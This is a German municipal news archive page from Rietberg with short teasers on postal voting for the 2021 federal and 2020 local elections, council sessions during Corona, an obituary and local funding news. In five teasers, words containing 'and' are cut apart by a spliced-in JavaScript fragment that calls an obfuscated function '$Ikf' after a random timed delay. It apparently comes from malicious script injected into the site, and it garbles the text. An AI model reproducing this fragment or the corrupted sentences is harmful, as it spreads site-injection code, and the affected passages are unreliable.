Category Archives: Politik Rietberg

Fristen für Briefwahl unbedingt beachten

Gut eine Woche vor der Bundestagswahl hält der Trend zur Briefwahl bei der Stadt Rietberg unvermindert an. Von insgesamt 21.843 Wahlberechtigten hatten bis Freitag, 17. September, 8230 Bürgerinnen und Bürger Briefwahlunterlagen angefordert. Das entspricht einem Anteil von 37,68 Prozent. Wer per Brief wählen möchte, sollte die Fristen beachten. Online können die Briefwahlunterlagen nur noch bis

21.865 Wahlbenachrichtigungen werden verschickt

21.865 Rietbergerinnen Rietberger sind nach aktuellem Stand berechtigt, an der Bundestagswahl im September teilzunehmen. Das sind fast 300 mehr als bei der vorherigen Wahl 2017. Derzeit werden die Wahlbenachrichtigungen verschickt. Auf ihnen ist vermerkt, in welchem Wahllokal am 26. September gewählt werden darf, und wie schon vorab per Brief gewählt werden kann. Ab dieser Woche

Online-Anträge noch bis Donnerstagmittag möglich

Bislang sind bereits mehr als 5100 Briefwahlanträge für die Kommunalwahl im Wahlbüro der Stadt Rietberg eingegangen. Das sind schon jetzt fast doppelt so viele wie bei der Kommunalwahl 2014 insgesamt. Am 13. September sind rund 24.000 Bürgerinnen und Bürger in Rietberg aufgerufen, um Stadtrat, Kreistag und Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andrat

Briefwahlanträge sind ab sofort möglich

Für die Kommunalwahl in vier Wochen ist die Stadt Rietberg bestens vorbereitet. 24.000 Rietberger dürfen am 13. September darüber abstimmen, wer künftig als Mitglied des Stadtrates über die Geschicke der Stadt mitentscheiden soll. Zwei weitere Stimmen hat jeder Bürger und jede Bürgerin, um den Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andrat oder die

Lokalpolitiker investieren in Bankgeschäfte

Mit Bankgeschäften haben Rietbergs Politiker und Bürgermeister Andreas Sunder in der Regel beruflich nicht viel zu tun. Ihr tägliches Brot sind demokratische Entscheidungen und Verwaltungshandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeln. Dass sie sich jetzt trotzdem eine eigene Bank haben errichten lassen, hat mit einem Thema zu tun, das allen Politikern in Rietberg

Sunder: „Spüre große Disziplin und Solidarität“

Mit einer Ratssitzung, wie sie die Stadt Rietberg in ihrer Geschichte noch nicht erlebt hat, ist die sechswöchige politische Zwangspause zu Ende gegangen. Die Corona-Schutzmaßnahmen beachtend hatten sich die politischen Beratungen zuletzt auf telefonische Besprechungen beschränkt. „Schön, dass wir die demokratischen Prozesse, wenn zunächst auch etwas abgespeckt, langsam wieder aufleben lassen können“, sagte Bürgermeister Andreas

Rietberg trauert um Hubert Deittert (CDU)

Er wollte es immer ganz genau wissen und aus erster Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and erfahren, was die Menschen bewegt: Der ehemalige Rietberger Bürgermeister Hubert Deittert hatte stets ein Ohr am Bürger – jederzeit. Das war ihm wichtig, das war das, was ihn angetrieben hat. Am Sonntag ist der CDU-Politiker aus

Stadtrat tagt in halber Besetzung

Nach den Osterferien will der Rietberger Stadtrat zumindest in eingeschränkter Form ein Stück weit zur Normalität zurückkehren: Für Donnerstag, 23. April, hat Bürgermeister Andreas Sunder eine Ratssitzung anberaumt. Die soll mit halber Besetzung und unter Einhaltung der Hygiene- und Abstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andsregeln im Alten Progymnasium stattfinden. „Mit den Fraktionsspitzen

André Kuper überbringt gute Nachricht über 807.000 Euro Landesförderung nach Rietberg

In diesen Tagen gibt es viele schlechte Nachrichten. Da ist eine gute Nachricht, welche Arbeitsplätze für die Zukunft sichern kann, eher selten. „Die Stadt Rietberg erhält aus der Städtebauförderung und dem Investitionspaket „Soziale Integration im Quartier des Landes NRW insgesamt 807.000 Euro“, so der direkt gewählte Landtagsabgeordnete André Kuper. Hierdurch werden insbesondere Baumaßnahmen im Historischen

Klimabeirat lädt zum Mitmachen ein

Am kommenden Donnerstag, 23. Januar, tagt erneut der Klimabeirat der Stadt Rietberg. Interessierte Bürgerinnen und Bürger, die gern an künftigen Klimaschutzmaßnahmen im Stadtgebiet mitwirken möchten, sind herzlich eingeladen, mitzuarbeiten. Der Klimabeirat ist zwar ein informelles Gremium ohne konkrete Befugnisse oder politische Entscheidungsgewalt. Allerdings fließen die erarbeiteten Inhalte aufgrund der unmittelbaren Einbindung von Politik und Verwaltung